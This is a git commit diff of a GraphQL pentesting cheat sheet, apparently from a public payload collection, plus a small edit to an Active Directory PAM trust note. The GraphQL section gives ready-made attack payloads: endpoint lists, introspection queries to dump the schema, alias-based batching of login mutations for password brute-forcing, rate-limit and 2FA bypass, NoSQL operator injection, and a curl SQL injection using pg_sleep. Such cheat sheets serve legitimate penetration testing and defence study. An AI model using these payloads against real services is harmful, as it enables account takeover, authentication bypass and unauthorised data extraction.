GraphQL Batching Attacks

This commit is contained in:
Swissky 2023-05-15 19:23:07 +02:00
parent 5af6a23a2e
commit 6adfe5d865
2 changed files with 118 additions and 50 deletions

View File

@ -8,18 +8,24 @@
- [GraphQL injection](#graphql-injection)
- [Summary](#summary)
- [Tools](#tools)
- [Exploit](#exploit)
- [Enumeration](#enumeration)
- [Common GraphQL endpoints](#common-graphql-endpoints)
- [Identify an injection point](#identify-an-injection-point)
- [Enumerate Database Schema via Introspection](#enumerate-database-schema-via-introspection)
- [List path](#list-path)
- [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions)
- [Enumerate the types' definition](#enumerate-the-types-definition)
- [List path to reach a type](#list-path-to-reach-a-type)
- [Exploit](#exploit)
- [Extract data](#extract-data)
- [Extract data using edges/nodes](#extract-data-using-edgesnodes)
- [Extract data using projections](#extract-data-using-projections)
- [Enumerate the types' definition](#enumerate-the-types-definition)
- [Use mutations](#use-mutations)
- [GraphQL Batching Attacks](#graphql-batching-attacks)
- [JSON list based batching](#json-list-based-batching)
- [Query name based batching](#query-name-based-batching)
- [Injections](#injections)
- [NOSQL injection](#nosql-injection)
- [SQL injection](#sql-injection)
- [GraphQL Batching Attacks](#graphql-batching-attacks)
- [References](#references)
## Tools
@ -36,12 +42,27 @@
* [IvanGoncharov/graphql-voyager)](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph
* [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client
## Exploit
## Enumeration
### Common GraphQL endpoints
Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
A more complete list is available at [danielmiessler/SecLists/graphql.txt](https://github.com/danielmiessler/SecLists/blob/fe2aa9e7b04b98d94432320d09b5987f39a17de8/Discovery/Web-Content/graphql.txt).
```ps1
/v1/explorer
/v1/graphiql
/graph
/graphql
/graphql/console/
/graphql.php
/graphiql
/graphiql.php
```
### Identify an injection point
Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
```js
example.com/graphql?query={__schema{types{name}}}
example.com/graphiql?query={__schema{types{name}}}
@ -163,13 +184,38 @@ query IntrospectionQuery {
}
```
Single line query to dump the database schema without fragments.
Single line queries to dump the database schema without fragments.
```js
__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}
```
### List path
```js
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
```
### Enumerate Database Schema via Suggestions
When you use an unknown keyword, the GraphQL backend will respond with a suggestion related to its schema.
```json
{
"message": "Cannot query field \"one\" on type \"Query\". Did you mean \"node\"?",
}
```
### Enumerate the types' definition
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
```javascript
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```
### List path to reach a type
```php
$ git clone https://gitlab.com/dee-see/graphql-path-enum
@ -192,6 +238,9 @@ Found 27 ways to reach the "Skill" node from the "Query" node:
- Query (query) -> Query (skills) -> Skill
```
## Exploit
### Extract data
```js
@ -227,14 +276,6 @@ example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
```
### Enumerate the types' definition
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
```javascript
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```
### Use mutations
Mutations work like function, you can use them to interact with the GraphQL.
@ -244,6 +285,64 @@ Mutations work like function, you can use them to interact with the GraphQL.
# mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
```
### GraphQL Batching Attacks
Common scenario:
* Password Brute-force Amplification Scenario
* Rate Limit bypass
* 2FA bypassing
#### JSON list based batching
> Query batching is a feature of GraphQL that allows multiple queries to be sent to the server in a single HTTP request. Instead of sending each query in a separate request, the client can send an array of queries in a single POST request to the GraphQL server. This reduces the number of HTTP requests and can improve the performance of the application.
Query batching works by defining an array of operations in the request body. Each operation can have its own query, variables, and operation name. The server processes each operation in the array and returns an array of responses, one for each query in the batch.
```json
[
{
"query":"..."
},{
"query":"..."
}
,{
"query":"..."
}
,{
"query":"..."
}
...
]
```
#### Query name based batching
```json
{
"query": "query { qname: Query { field1 } qname1: Query { field1 } }"
}
```
Send the same mutation several times using aliases
```js
mutation {
login(pass: 1111, username: "bob")
second: login(pass: 2222, username: "bob")
third: login(pass: 3333, username: "bob")
fourth: login(pass: 4444, username: "bob")
}
```
## Injections
> SQL and NoSQL Injections are still possible since GraphQL is just a layer between the client and the database.
### NOSQL injection
Use `$regex`, `$ne` from []() inside a `search` parameter.
@ -280,37 +379,6 @@ Simple SQL injection inside a graphql field.
curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
```
### GraphQL Batching Attacks
Common scenario:
* Password Brute-force Amplification Scenario
* 2FA bypassing
```powershell
mutation finishChannelVerificationMutation(
$input FinishChannelVerificationInput!,
$input2 FinishChannelVerificationInput!,
$input3 FinishChannelVerificationInput!,
){
first: finishChannelVerificationMutation(input: $input){
channel{
id
option{
... onChannelSmsOptions{
number
}
}
status
notificationSubscription(last: 1000){ etc... }
}
}
second: finishChannelVerificationMutation(input: $input2){...}
third: finishChannelVerificationMutation(input: $input3){...}
}
```
## References
@ -330,3 +398,4 @@ mutation finishChannelVerificationMutation(
* [Graphql Bug to Steal Anyones Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417)
* [GraphQL Batching Attack - RENATAWALLARM - DECEMBER 13, 2019](https://lab.wallarm.com/graphql-batching-attack/)
* [GraphQL for Pentesters presentation by ACCEIS - 01/12/2022](https://acceis.github.io/prez-graphql/) - [source](https://github.com/Acceis/prez-graphql)
* [Exploiting GraphQL - Aug 29, 2021 - AssetNote - Shubham Shah](https://blog.assetnote.io/2021/08/29/exploiting-graphql/)

View File

@ -3481,8 +3481,7 @@ ls \\machine.domain.local\c$
## Privileged Access Management (PAM) Trust
> PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. Temporary Group Membership also introduced so perms only given for set time.
Enumeration
> PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon.
Requirements:
* Windows Server 2016 or earlier